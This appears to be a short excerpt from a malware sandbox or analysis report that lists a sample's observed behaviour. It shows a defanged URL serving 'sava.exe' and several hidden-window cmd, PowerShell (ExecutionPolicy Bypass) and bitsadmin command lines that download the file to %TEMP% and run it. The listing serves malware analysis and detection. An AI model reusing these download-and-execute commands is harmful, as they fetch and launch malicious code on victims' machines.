Technical Information
- http://21#.#.117.63/sava.exe as %temp%\6247427.exe
- http://21#.#.117.63/sava.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://21#.#.117.63/sava.exe','%TEMP%\6247427.exe');Start-Process '%TEMP%\6247427.exe'' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer getitman /download /priority high http://21#.#.117.63/sava.exe %TEMP%\23526427.exe&start %TEMP%\23526427.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://21#.#.117.63/sava.exe','%TEMP%\6247427.exe');Start-Process '%TEMP%\6247427.exe'
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer getitman /download /priority high http://21#.#.117.63/sava.exe %TEMP%\23526427.exe&start %TEMP%\23526427.exe
- '<SYSTEM32>\bitsadmin.exe' /transfer getitman /download /priority high http://21#.#.117.63/sava.exe %TEMP%\23526427.exe